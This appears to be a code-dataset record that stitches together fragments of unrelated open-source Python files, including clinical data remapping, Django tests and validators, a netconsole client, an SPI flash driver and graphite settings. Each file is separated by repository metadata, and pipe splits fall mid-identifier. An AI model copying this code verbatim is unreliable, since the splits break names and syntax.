remapDict["breast_tumor_pathologic_t_stage"]["t4"] = 4
remapDict["breast_tumor_pathologic_t_stage"]["t4a"] = 4.2
remapDict["breast_tumor_pathologic_t_stage"]["t4b"] = 4.4
remapDict["breast_tumor_pathologic_t_stage"]["t4c"] = 4.6
remapDict["breast_tumor_pathologic_t_stage"]["t4d"] = 4.8
remapDict["breast_carcinoma_estrogen_receptor_status"] = {}
remapDict["breast_carcinoma_estrogen_receptor_status"]["na"] = "NA"
remapDict["breast_carcinoma_estrogen_receptor_status"]["not_performed"] = "NA"
remapDict["breast_carcinoma_estrogen_receptor_status"][
"performed_but_not_available"] = "NA"
remapDict["breast_carcinoma_estrogen_receptor_status"][
"indeterminate"] = "indeterminate"
remapDict["breast_carcinoma_estrogen_receptor_status"]["positive"] = "positive"
remapDict["breast_carcinoma_estrogen_receptor_status"]["negative"] = "negative"
remapDict["lymphnode_pathologic_spread"] = {}
remapDict["lymphnode_pathologic_spread"]["na"] = "NA"
remapDict["lymphnode_pathologic_spread"]["nx"] = "NA"
remapDict["lymphnode_pathologic_spread"]["n0"] = 0
remapDict["lymphnode_pathologic_spread"]["n1"] = 1
remapDict["lymphnode_pathologic_spread"]["n1a"] = 1.2
remapDict["lymphnode_pathologic_spread"]["n1b"] = 1.4
remapDict["lymphnode_pathologic_spread"]["n1c"] = 1.6
remapDict["lymphnode_pathologic_spread"]["n2"] = 2
remapDict["lymphnode_pathologic_spread"]["n2a"] = 2.2
remapDict["lymphnode_pathologic_spread"]["n2b"] = 2.4
remapDict["lymphnode_pathologic_spread"]["n2c"] = 2.6
remapDict["lymphnode_pathologic_spread"]["n3"] = 3
remapDict["lymphnode_pathologic_spread"]["n3a"] = 3.2
remapDict["breast_tumor_pathologic_n_stage"] = {}
remapDict["breast_tumor_pathologic_n_stage"]["na"] = "NA"
remapDict["breast_tumor_pathologic_n_stage"]["pnx"] = "NA"
remapDict["br
|
npardington/fabric-bolt
|
fabric_bolt/task_runners/socketio/__init__.py
|
Python
|
mit
| 241 | 0 |
from ..base import BaseTaskRunn
|
erBackend
class SocketIOBackend(BaseTaskRunnerBackend):
def __init__(self):
from . import sockets
def get_detail_template(self):
return 'task_runners/deployment
|
_detail_socketio.html'
|
skyoo/jumpserver
|
apps/common/drf/parsers/base.py
|
Python
|
gpl-2.0
| 4,553 | 0.001349 |
import abc
import json
import codecs
from rest_framework import serializers
from django.utils.translation import ugettext_lazy as _
from rest_framework.parsers import BaseParser
from rest_framework import status
from rest_framework.exceptions import ParseError, APIException
from common.utils import get_logger
logger = get_logger(__file__)
class FileContentOverflowedError(APIException):
status_code = status.HTTP_400_BAD_REQUEST
default_code = 'file_content_overflowed'
default_detail = _('The file content overflowed (The maximum length `{}` bytes)')
class BaseFileParser(BaseParser):
FILE_CONTENT_MAX_LENGTH = 1024 * 1024 * 10
serializer_cls = None
def check_content_length(self, meta):
content_length = int(meta.get('CONTENT_LENGTH', meta.get('HTTP_CONTENT_LENGTH', 0)))
if content_length > self.FILE_CONTENT_MAX_LENGTH:
msg = FileContentOverflowedError.default_detail.format(self.FILE_CONTENT_MAX_LENGTH)
logger.error(msg)
raise FileContentOverflowedError(msg)
@staticmethod
def get_stream_data(stream):
stream_data = stream.read()
stream_data = stream_data.strip(codecs.BOM_UTF8)
return stream_data
@abc.abstractmethod
def generate_rows(self, stream_data):
raise NotImplemented
def get_column_titles(self, rows):
return next(rows)
def convert_to_field_names(self, column_titles):
fields_map = {}
fields = self.serializer_cls().fields
fields_map.update({v.label: k for k, v in fields.items()})
fields_map.update({k: k for k, _ in fields.items()})
|
field_names = [
fields_map.get(column_title.strip('*'), '')
for column_title in column_titles
]
return field_names
@staticmethod
def _replace_chinese_quote(s):
trans_table = str.maketrans({
'“': '"',
'”': '"',
'‘': '"',
'’': '"',
'\'': '"'
})
return s.translate(trans_table)
@classmethod
def pro
|
cess_row(cls, row):
"""
构建json数据前的行处理
"""
new_row = []
for col in row:
# 转换中文引号
col = cls._replace_chinese_quote(col)
# 列表/字典转换
if isinstance(col, str) and (
(col.startswith('[') and col.endswith(']'))
or
(col.startswith("{") and col.endswith("}"))
):
col = json.loads(col)
new_row.append(col)
return new_row
def process_row_data(self, row_data):
"""
构建json数据后的行数据处理
"""
new_row_data = {}
serializer_fields = self.serializer_cls().fields
for k, v in row_data.items():
if isinstance(v, list) or isinstance(v, dict) or isinstance(v, str) and k.strip() and v.strip():
# 解决类似disk_info为字符串的'{}'的问题
if not isinstance(v, str) and isinstance(serializer_fields[k], serializers.CharField):
v = str(v)
new_row_data[k] = v
return new_row_data
def generate_data(self, fields_name, rows):
data = []
for row in rows:
# 空行不处理
if not any(row):
continue
row = self.process_row(row)
row_data = dict(zip(fields_name, row))
row_data = self.process_row_data(row_data)
data.append(row_data)
return data
def parse(self, stream, media_type=None, parser_context=None):
parser_context = parser_context or {}
try:
view = parser_context['view']
meta = view.request.META
self.serializer_cls = view.get_serializer_class()
except Exception as e:
logger.debug(e, exc_info=True)
raise ParseError('The resource does not support imports!')
self.check_content_length(meta)
try:
stream_data = self.get_stream_data(stream)
rows = self.generate_rows(stream_data)
column_titles = self.get_column_titles(rows)
field_names = self.convert_to_field_names(column_titles)
data = self.generate_data(field_names, rows)
return data
except Exception as e:
logger.error(e, exc_info=True)
raise ParseError('Parse error! ({})'.format(self.media_type))
|
robotpy/pynetconsole
|
netconsole/netconsole.py
|
Python
|
isc
| 6,782 | 0.000885 |
from argparse import ArgumentParser
import socket
import struct
import sys
import threading
import time
from ._fakeds import FakeDS
__all__ = ["Netconsole", "main", "run"]
def _output_fn(s):
sys.stdout.write(
s.encode(sys.stdout.encoding, errors="replace").decode(sys.stdout.encoding)
)
sys.stdout.write("\n")
class StreamEOF(IOError):
pass
class Netconsole:
"""
Implements the 2018+ netconsole protocol
"""
TAG_ERROR = 11
TAG_INFO = 12
def __init__(self, printfn=_output_fn):
self.frames = {self.TAG_ERROR: self._onError, self.TAG_INFO: self._onInfo}
self.cond = threading.Condition()
self.sock = None
self.sockrfp = None
self.sockwfp = None
self.sockaddr = None
self.running = False
self.printfn = printfn
def start(self, address, port=1741, connect_event=None, block=True):
with self.cond:
if self.running:
raise ValueError("Cannot start without stopping first")
self.sockaddr = (address, port)
self.connect_event = connect_event
self.running = True
self._rt = threading.Thread(
target=self._readThread, name="nc-read-thread", daemon=True
)
self._rt.start()
if block:
self._keepAlive()
else:
self._kt = threading.Thread(
target=self._keepAlive, name="nc-keepalive-thread", daemon=True
)
self._kt.start()
@property
def connected(self):
return self.sockrfp is not None
def stop(self):
with self.cond:
self.running = False
self.cond.notify_all()
self.sock.close()
def _connectionDropped(self):
print(".. connection dropped", file=sys.stderr)
self.sock.close()
with self.cond:
self.sockrfp = None
self.cond.notify_all()
def _keepAliveReady(self):
if not self.running:
return -1
elif not self.connected:
return -2
def _keepAlive(self):
while self.running:
with self.cond:
ret = self.cond.wait_for(self._keepAliveReady, timeout=2.0)
if ret == -1:
return
elif ret == -2:
self._reconnect()
else:
try:
self.sockwfp.write(b"\x00\x00")
self.sockwfp.flush()
except IOError:
|
self._connectionDropped()
def _readThreadReady(self):
if not self.running:
return -1
return self.sockrfp
def _readThread(self):
while True
|
:
with self.cond:
sockrfp = self.cond.wait_for(self._readThreadReady)
if sockrfp == -1:
return
try:
data = sockrfp.read(self._headerSz)
except IOError:
data = ""
if len(data) != self._headerSz:
self._connectionDropped()
continue
blen, tag = self._header.unpack(data)
blen -= 1
try:
buf = sockrfp.read(blen)
except IOError:
buf = ""
if len(buf) != blen:
self._connectionDropped()
continue
# process the frame
fn = self.frames.get(tag)
if fn:
fn(buf)
else:
print("ERROR: Unknown tag %s; Ignoring..." % tag, file=sys.stderr)
def _reconnect(self):
# returns once the socket is connected or an exit is requested
while self.running:
sys.stderr.write("Connecting to %s:%s..." % self.sockaddr)
try:
sock = socket.create_connection(self.sockaddr, timeout=3.0)
except IOError:
sys.stderr.write(" :(\n")
# don't busywait, just in case
time.sleep(1.0)
continue
else:
sys.stderr.write("OK\n")
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
sock.settimeout(None)
sockrfp = sock.makefile("rb")
sockwfp = sock.makefile("wb")
if self.connect_event:
self.connect_event.set()
with self.cond:
self.sock = sock
self.sockrfp = sockrfp
self.sockwfp = sockwfp
self.cond.notify_all()
break
#
# Message
#
_header = struct.Struct(">Hb")
_headerSz = _header.size
_errorFrame = struct.Struct(">fHHiB")
_errorFrameSz = _errorFrame.size
_infoFrame = struct.Struct(">fH")
_infoFrameSz = _infoFrame.size
_slen = struct.Struct(">H")
_slenSz = _slen.size
def _onError(self, b):
ts, _seq, _numOcc, errorCode, flags = self._errorFrame.unpack_from(b, 0)
details, nidx = self._getStr(b, self._errorFrameSz)
location, nidx = self._getStr(b, nidx)
callStack, _ = self._getStr(b, nidx)
self.printfn(
"[%0.2f] %d %s %s %s" % (ts, errorCode, details, location, callStack)
)
def _getStr(self, b, idx):
sidx = idx + self._slenSz
(blen,) = self._slen.unpack_from(b, idx)
nextidx = sidx + blen
return b[sidx:nextidx].decode("utf-8", errors="replace"), nextidx
def _onInfo(self, b):
ts, _seq = self._infoFrame.unpack_from(b, 0)
msg = b[self._infoFrameSz :].decode("utf-8", errors="replace")
self.printfn("[%0.2f] %s" % (ts, msg))
def run(address, connect_event=None, fakeds=False):
"""
Starts the netconsole loop. Note that netconsole will only send output
if the DS is connected. If you don't have a DS available, the 'fakeds'
flag can be specified to fake a DS connection.
:param address: Address of the netconsole server
:param connect_event: a threading.event object, upon which the 'set'
function will be called when the connection has
succeeded.
:param fakeds: Fake a driver station connection
"""
if fakeds:
ds = FakeDS()
ds.start(address)
nc = Netconsole()
nc.start(address, connect_event=connect_event)
def main():
parser = ArgumentParser()
parser.add_argument("address", help="Address of Robot")
parser.add_argument(
"-f",
"--fakeds",
action="store_true",
default=False,
help="Fake a driver station connection to the robot",
)
args = parser.parse_args()
run(args.address, fakeds=args.fakeds)
|
Zephor5/zspider
|
zspider/pipelines/test_result.py
|
Python
|
mit
| 283 | 0 |
# coding=utf-8
__author__ = "
|
zephor"
class TestResultPipeLine(object):
@classmethod
def from_crawler(cls, crawler):
crawler.spider.test_result = []
return cls()
@staticmethod
def process_item(item, spider):
|
spider.test_result.append(item)
|
lgnq/RPI8836
|
issi.py
|
Python
|
lgpl-3.0
| 2,227 | 0.015267 |
#!/usr/bin/env python
#-*- coding: utf-8 -*-
import define
import tw8836
import spi
def quad_check():
status = spi.status1_read()
if (status & 0x40):
print 'SPI flash is already in QUAD mode'
return define.TRUE
else:
print 'SPI flash is not in QUAD mode yet'
return define.FALSE
def quad_enable():
status = spi.status1_read()
spi.write_enable()
spi.status1_write(status | 0x40)
spi.write_disable()
def quad_disable():
status = spi.status1_read()
spi.write_enable()
spi.status1_write(status & ~0x40)
spi.write_disable()
def four_byte_check():
status = spi.status2_read()
if (status & 0x20):
if define.DEBUG == define.ON:
print 'SPI flash is in 4 Byte mode'
spi.bank_address_register_write(0x80)
return define.TRUE
else:
if define.DEBUG == define.ON:
print 'SPI flash is not in 4 Byte mode'
spi.bank_address_register_write(0x0)
|
return define.FALSE
def four_byte_enter()
|
:
tw8836.write_page(0x04)
tw8836.write(0xF3, (spi.DMA_DEST_CHIPREG << 6) + spi.DMA_CMD_COUNT_1)
tw8836.write(0xF5, 0) #length high
tw8836.write(0xF8, 0) #length middle
tw8836.write(0xF9, 0) #length low
tw8836.write(0xFA, spi.SPICMD_EN4B)
tw8836.write(0xF4, spi.SPI_CMD_OPT_NONE | spi.DMA_START)
def four_byte_exit():
tw8836.write_page(0x04)
tw8836.write(0xF3, (spi.DMA_DEST_CHIPREG << 6) + spi.DMA_CMD_COUNT_1)
tw8836.write(0xF5, 0) #length high
tw8836.write(0xF8, 0) #length middle
tw8836.write(0xF9, 0) #length low
tw8836.write(0xFA, spi.SPICMD_EX4B)
tw8836.write(0xF4, spi.SPI_CMD_OPT_NONE | spi.DMA_START)
def erase_fail_check():
status = spi.security_register_read()
if (status & 0x40):
print 'erase failed'
spi.sr_clear()
return define.TRUE
else:
print 'erase succeed'
return define.FALSE
def dummy_cycles_config(mode, cycles):
print 'dummy_cycles_config in issi.py'
status2_register = spi.status2_read()
print hex(status2_register)
|
DanielNeugebauer/adhocracy
|
src/adhocracy/forms/common.py
|
Python
|
agpl-3.0
| 30,325 | 0.000297 |
import csv
from datetime import datetime
import re
from StringIO import StringIO
from PIL import Image
import formencode
from pylons import tmpl_context as c
from pylons.i18n import _
from webhelpers.html import literal
from sqlalchemy import func
from adhocracy import config
from adhocracy.lib.auth import can
from adhocracy.lib.unicode import UnicodeDictReader
FORBIDDEN_NAMES = ["www", "static", "mail", "edit", "create", "settings",
"join", "leave", "control", "test", "support", "page",
"proposal", "wiki", "blog", "proposals", "admin", "dl",
"downloads", "stats", "branch", "merge", "pull", "push",
"hg", "git", "adhocracy", "user", "openid", "auth", "watch",
"poll", "delegation", "event", "comment", "root", "search",
"tag", "svn", "trac", "lists", "list", "new", "update",
"variant", "provision", "untag", "code", "sso", "velruse"]
VALIDUSER = re.compile(r"^[a-zA-Z0-9_\-]{3,255}$")
VALIDVARIANT = re.compile(r"^[\w\-_ ]{1,255}$", re.U)
TIME = re.compile(r"\d{1,2}.\d{1,2}.\d{4}")
class UniqueUsername(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import meta, User
if not value or not isinstance(value, basestring):
raise formencode.Invalid(
_('No username is given'),
value, state)
if len(value.strip()) < 3:
raise formencode.Invalid(
_('Username is too short'),
value, state)
if not VALIDUSER.match(value) or value in FORBIDDEN_NAMES:
raise formencode.Invalid(
_('The username is invalid'),
value, state)
if meta.Session.query(User.user_name).filter(
func.lower(User.user_name) == value.lower()
).count():
raise formencode.Invalid(
_('That username already exists'),
value, state)
return value
class UniqueEmail(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import User
if User.all_q()\
.filter(func.lower(User.email) == value.lower()).count():
raise formencode.Invalid(
_('That email is already registered'),
value, state)
return value
class UniqueOtherEmail(formencode.FancyValidator):
"""
Check if email is unused or belongs to the current user.
"""
def _to_python(self, value, state):
if (c.user is not None and c.user.email is not None
and c.user.email.lower() == value.lower()):
return value
from adhocracy.model import User
if User.all_q()\
.filter(func.lower(User.email) == value.lower()).count():
|
raise formencode.Invalid(
_('That email is already used b
|
y another account'),
value, state)
return value
class ValidLocale(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy import i18n
if value in i18n.LOCALE_STRINGS:
return value
else:
raise formencode.Invalid(_('Invalid locale choice'), value, state)
class ValidDate(formencode.FancyValidator):
def _to_python(self, value, state):
if not TIME.match(value):
raise formencode.Invalid(
_('Invalid date, expecting DD.MM.YYYY'),
value, state)
try:
return datetime.strptime(value, "%d.%m.%Y")
except ValueError:
raise formencode.Invalid(
_('Invalid date, expecting DD.MM.YYYY'),
value, state)
return value
class ValidHTMLColor(formencode.validators.Regex):
regex = r'^#[0-9a-fA-F]{1,6}'
def to_python(self, value, state):
try:
super(ValidHTMLColor, self).to_python(value, state)
except formencode.Invalid:
raise formencode.Invalid(
_("Please enter a html color code like '#f0f0f0'. "
"'%(value)' is not a valid color code."), value, state)
return value
class UniqueInstanceKey(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import Instance
if not value:
raise formencode.Invalid(
_('No instance key is given'),
value, state)
if not Instance.INSTANCE_KEY.match(value) or value in FORBIDDEN_NAMES:
raise formencode.Invalid(
_('The instance key is invalid'),
value, state)
if Instance.find(value):
raise formencode.Invalid(
_('An instance with that key already exists'),
value, state)
return value
class StaticPageKey(formencode.FancyValidator):
def to_python(self, value, state):
from adhocracy.lib import staticpage
if not value:
raise formencode.Invalid(
_('No static key is given'),
value, state)
if not staticpage.STATICPAGE_KEY.match(value) or value in ['new']:
raise formencode.Invalid(
_('The static key is invalid'),
value, state)
return value
class ValidDelegateable(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import Delegateable
delegateable = Delegateable.find(value)
if not delegateable:
raise formencode.Invalid(
_("No entity with ID '%s' exists") % value,
value, state)
return delegateable
class ValidProposal(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import Proposal
proposal = Proposal.find(value)
if not proposal:
raise formencode.Invalid(
_("No proposal with ID '%s' exists") % value,
value, state)
return proposal
class ValidInstanceGroup(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import Group
group = Group.by_code(value)
if not group:
raise formencode.Invalid(
_("No group with ID '%s' exists") % value,
value, state)
if not group.is_instance_group():
raise formencode.Invalid(
_("Group '%s' is no instance group") % group.code,
value, state)
return group
class ContainsChar(formencode.validators.Regex):
regex = r"[a-zA-Z]"
def to_python(self, value, state):
try:
super(ContainsChar, self).to_python(value, state)
except formencode.Invalid:
raise formencode.Invalid(_("At least one character is required"),
value, state)
return value
class ValidBadgeInstance(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import Instance
if can.badge.manage_global() or can.badge.edit_global():
if value:
instance = Instance.find(value)
if instance is None:
raise AssertionError("Could not find instance %s" % value)
return instance
return None
elif can.badge.manage_instance() or can.badge.edit_instance():
instance = Instance.find(value)
if instance is not None and instance == c.instance:
return instance
raise formencode.Invalid(
_("You're not allowed to edit global badges"),
value, state)
class ValidUserBadge(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import UserBadge
badge = UserBadge.by_id(value, instance_filter=False)
if badge is None or badge.instance not in [None, c.instance]:
raise formencode.Invalid(
_("No Badge ID '%s' exists") % value,
value, state)
return badg
|
drjova/cds-demosite
|
cds/modules/records/minters.py
|
Python
|
gpl-2.0
| 1,381 | 0 |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Persistent identifier minters."""
from __future__ import absolute_import, print_function
from .providers import CDSRecordIdProvider
def recid_minter(
|
record_uuid, data):
"""Mint record identifiers."""
assert 'recid' not in data
provider = CDSRecordIdProvider.create(
object_type='rec', object_uuid=record_uui
|
d)
data['recid'] = int(provider.pid.pid_value)
return provider.pid
|
jokey2k/sentry
|
src/sentry/rules/actions/__init__.py
|
Python
|
bsd-3-clause
| 241 | 0 |
"""
sentry.rules.actions
~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from .base import * # NO
|
QA
|
|
helenst/django
|
tests/foreign_object/tests.py
|
Python
|
bsd-3-clause
| 18,027 | 0.003495 |
import datetime
from operator import attrgetter
from .models import (
Country, Person, Group, Membership, Friendship, Article,
ArticleTranslation, ArticleTag, ArticleIdea, NewsArticle)
from django.test import TestCase, skipUnlessDBFeature
from django.utils.translation import activate
from django.core.exceptions import FieldError
from django import forms
# Note that these tests are testing internal implementation details.
# ForeignObject is not part of public API.
class MultiColumnFKTests(TestCase):
def setUp(self):
# Creating countries
self.usa = Country.objects.create(name="United States of America")
self.soviet_union = Country.objects.create(name="Soviet Union")
Person()
# Creating People
self.bob = Person()
self.bob.name = 'Bob'
self.bob.person_country = self.usa
self.bob.save()
self.jim = Person.objects.create(name='Jim', person_country=self.usa)
self.george = Person.objects.create(name='George', person_country=self.usa)
self.jane = Person.objects.create(name='Jane', person_country=self.soviet_union)
self.mark = Person.objects.create(name='Mark', person_country=self.soviet_union)
self.sam = Person.objects.create(name='Sam', person_country=self.soviet_union)
# Creating Groups
self.kgb = Group.objects.create(name='KGB', group_country=self.soviet_union)
self.cia = Group.objects.create(name='CIA', group_country=self.usa)
self.republican = Group.objects.create(name='Republican', group_country=self.usa)
self.democrat = Group.objects.create(name='Democrat', group_country=self.usa)
def test_get_succeeds_on_multicolumn_match(self):
# Membership objects have access to their related Person if both
# country_ids match between them
membership = Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.bob.id, group_id=self.cia.id)
person = membership.person
self.assertEqual((person.id, person.name), (self.bob.id, "Bob"))
def test_get_fails_on_multicolumn_mismatch(self):
# Membership objects returns DoesNotExist error when the there is no
# Person with the same id and country_id
membership = Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.jane.id, group_id=self.cia.id)
self.assertRaises(Person.DoesNotExist, getattr, membership, 'person')
def test_reverse_query_returns_correct_result(self):
# Creating a valid membership because it has the same country has the person
Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.bob.id, group_id=self.cia.id)
# Creating an invalid membership because it has a different country has the person
Membership.objects.create(
membership_country_id=self.soviet_union.id, person_id=self.bob.id,
group_id=self.republican.id)
self.assertQuerysetEqual(
self.bob.membership_set.all(), [
self.cia.id
],
attrgetter("group_id")
)
def test_query_filters_correctly(self):
# Creating a to valid memberships
Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.bob.id, group_id=self.cia.id)
Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.jim.id,
group_id=self.cia
|
.id)
# Creating an invalid membership
|
Membership.objects.create(membership_country_id=self.soviet_union.id,
person_id=self.george.id, group_id=self.cia.id)
self.assertQuerysetEqual(
Membership.objects.filter(person__name__contains='o'), [
self.bob.id
],
attrgetter("person_id")
)
def test_reverse_query_filters_correctly(self):
timemark = datetime.datetime.utcnow()
timedelta = datetime.timedelta(days=1)
# Creating a to valid memberships
Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.bob.id,
group_id=self.cia.id, date_joined=timemark - timedelta)
Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.jim.id,
group_id=self.cia.id, date_joined=timemark + timedelta)
# Creating an invalid membership
Membership.objects.create(
membership_country_id=self.soviet_union.id, person_id=self.george.id,
group_id=self.cia.id, date_joined=timemark + timedelta)
self.assertQuerysetEqual(
Person.objects.filter(membership__date_joined__gte=timemark), [
'Jim'
],
attrgetter('name')
)
def test_forward_in_lookup_filters_correctly(self):
Membership.objects.create(membership_country_id=self.usa.id, person_id=self.bob.id,
group_id=self.cia.id)
Membership.objects.create(membership_country_id=self.usa.id, person_id=self.jim.id,
group_id=self.cia.id)
# Creating an invalid membership
Membership.objects.create(
membership_country_id=self.soviet_union.id, person_id=self.george.id,
group_id=self.cia.id)
self.assertQuerysetEqual(
Membership.objects.filter(person__in=[self.george, self.jim]), [
self.jim.id,
],
attrgetter('person_id')
)
self.assertQuerysetEqual(
Membership.objects.filter(person__in=Person.objects.filter(name='Jim')), [
self.jim.id,
],
attrgetter('person_id')
)
def test_double_nested_query(self):
m1 = Membership.objects.create(membership_country_id=self.usa.id, person_id=self.bob.id,
group_id=self.cia.id)
m2 = Membership.objects.create(membership_country_id=self.usa.id, person_id=self.jim.id,
group_id=self.cia.id)
Friendship.objects.create(from_friend_country_id=self.usa.id, from_friend_id=self.bob.id,
to_friend_country_id=self.usa.id, to_friend_id=self.jim.id)
self.assertQuerysetEqual(Membership.objects.filter(
person__in=Person.objects.filter(
from_friend__in=Friendship.objects.filter(
to_friend__in=Person.objects.all()))),
[m1], lambda x: x)
self.assertQuerysetEqual(Membership.objects.exclude(
person__in=Person.objects.filter(
from_friend__in=Friendship.objects.filter(
to_friend__in=Person.objects.all()))),
[m2], lambda x: x)
def test_select_related_foreignkey_forward_works(self):
Membership.objects.create(membership_country=self.usa, person=self.bob, group=self.cia)
Membership.objects.create(membership_country=self.usa, person=self.jim, group=self.democrat)
with self.assertNumQueries(1):
people = [m.person for m in Membership.objects.select_related('person').order_by('pk')]
normal_people = [m.person for m in Membership.objects.all().order_by('pk')]
self.assertEqual(people, normal_people)
def test_prefetch_foreignkey_forward_works(self):
Membership.objects.create(membership_country=self.usa, person=self.bob, group=self.cia)
Membership.objects.create(membership_country=self.usa, person=self.jim, group=self.democrat)
with self.assertNumQueries(2):
people = [
m.person for m in Membership.objects.prefetch_related('person').order_by('pk')]
normal_people = [m.person for m in Membership.objects.order_by('pk')]
self.assertEqual(people, normal_people)
def test_prefetch_foreignkey_reverse_works(self):
Membership.objects.create(membership_country=self.usa, person=self.bob, group=self.cia)
Membership.objects.create(membership_country=self.usa,
|
g76r/graphite-web
|
webapp/graphite/settings.py
|
Python
|
apache-2.0
| 6,812 | 0.009689 |
"""Copyright 2008 Orbitz WorldWide
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
# Django settings for graphite project.
# DO NOT MODIFY THIS FILE DIRECTLY - use local_settings.py instead
import sys, os
from os.path import abspath, dirname, join
from warnings import warn
GRAPHITE_WEB_APP_SETTINGS_LOADED = False
WEBAPP_VERSION = '0.10.0-alpha'
DEBUG = False
JAVASCRIPT_DEBUG = False
# Filesystem layout
WEB_DIR = dirname( abspath(__file__) )
WEBAPP_DIR = dirname(WEB_DIR)
GRAPHITE_ROOT = dirname(WEBAPP_DIR)
# Initialize additional path variables
# Defaults for these are set after local_settings is imported
CONTENT_DIR = ''
CSS_DIR = ''
CONF_DIR = ''
DASHBOARD_CONF = ''
GRAPHTEMPLATES_CONF = ''
STORAGE_DIR = ''
WHITELIST_FILE = ''
INDEX_FILE = ''
LOG_DIR = ''
CERES_DIR = ''
WHISPER_DIR = ''
RRD_DIR = ''
STANDARD_DIRS = []
CLUSTER_SERVERS = []
# Cluster settings
CLUSTER_SERVERS = []
REMOTE_FIND_TIMEOUT = 3.0
REMOTE_FETCH_TIMEOUT = 6.0
REMOTE_RETRY_DELAY = 60.0
REMOTE_READER_CACHE_SIZE_LIMIT = 1000
CARBON_METRIC_PREFIX='carbon'
CARBONLINK_HOSTS = ["127.0.0.1:7002"]
CARBONLINK_TIMEOUT = 1.0
CARBONLINK_HASHING_KEYFUNC = None
CARBONLINK_RETRY_DELAY = 15
REPLICATION_FACTOR = 1
MEMCACHE_HOSTS = []
MEMCACHE_KEY_PREFIX = ''
FIND_CACHE_DURATION = 300
FIND_TOLERANCE = 2 * FIND_CACHE_DURATION
DEFAULT_CACHE_DURATION = 60 #metric data and graphs are cached for one minute by default
LOG_CACHE_PERFORMANCE = False
LOG_ROTATE = True
MAX_FETCH_RETRIES = 2
#Remote rendering settings
REMOTE_RENDERING = False #if True, rendering is delegated to RENDERING_HOSTS
RENDERING_HOSTS = []
REMOTE_RENDER_CONNECT_TIMEOUT = 1.0
LOG_RENDERING_PERFORMANCE = False
#Miscellaneous settings
SMTP_SERVER = "localhost"
DOCUMENTATION_URL = "http://graphite.readthedocs.org/"
ALLOW_ANONYMOUS_CLI = True
LOG_METRIC_ACCESS = False
LEGEND_MAX_ITEMS = 10
RRD_CF = 'AVERAGE'
STORAGE_FINDERS = (
'graphite.finders.standard.StandardFinder',
)
#Authentication settings
USE_LDAP_AUTH = False
LDAP_SERVER = "" # "ldapserver.mydomain.com"
LDAP_PORT = 389
LDAP_USE_TLS = False
LDAP_SEARCH_BASE = "" # "OU=users,DC=mydomain,DC=com"
LDAP_BASE_USER = "" # "CN=some_readonly_account,DC=mydomain,DC=com"
LDAP_BASE_PASS = "" # "my_password"
LDAP_USER_QUERY = "" # "(username=%s)" For Active Directory use "(sAMAccountName=%s)"
LDAP_URI = None
#Set this to True to delegate authentication to the web server
USE_REMOTE_USER_AUTHENTICATION = False
# Django 1.5 requires this so we set a default but warn the user
SECRET_KEY = 'UNSAFE_DEFAULT'
# Django 1.5 requires this to be set. Here we default to prior behavior and allow all
ALLOWED_HOSTS = [ '*' ]
# Override to link a different URL for login (e.g. for django_openid_auth)
LOGIN_URL = '/account/login'
# Set to True to require authentication to save or delete dashboards
DASHBOARD_REQUIRE_AUTHENTICATION = False
# Require Django change/delete permissions to save or delete dashboards.
# NOTE: Requires DASHBOARD_REQUIRE_AUTHENTICATION to be set
DASHBOARD_REQUIRE_PERMISSIONS = False
# Name of a group to which the user must belong to save or delete dashboards. Alternative to
# DASHBOARD_REQUIRE_PERMISSIONS, particularly useful when using only LDAP (without Admin app)
# NOTE: Requires DASHBOARD_REQUIRE_AUTHENTICATION to be set
DASHBOARD_REQUIRE_EDIT_GROUP = None
DATABASES = {
'default': {
'NAME': '/opt/graphite/storage/graphite.db',
'ENGINE': 'django.db.backends.sqlite3',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
},
}
# If using rrdcached, set to the address or socket of the daemon
FLUSHRRDCACHED = ''
## Load our local_settings
try:
from graphite.local_settings import *
except ImportError:
print >> sys.stderr, "Could not import graphite.local_settings, using defaults!"
## Load Django settings if they werent picked up in local_settings
if not GRAPHITE_WEB_APP_SETTINGS_LOADED:
from graphite.app_settings import *
## Set config dependent on flags set in local_settings
# Path configuration
if not CONTENT_DIR:
CONTENT_DIR = join(WEBAPP_DIR, 'content')
if not CSS_DIR:
CSS_DIR = join(CONTENT_DIR, 'css')
if not CONF_DIR:
CONF_DIR = os.environ.get('GRAPHITE_CONF_DIR', join(GRAPHITE_ROOT, 'conf'))
if not DASHBOARD_CONF:
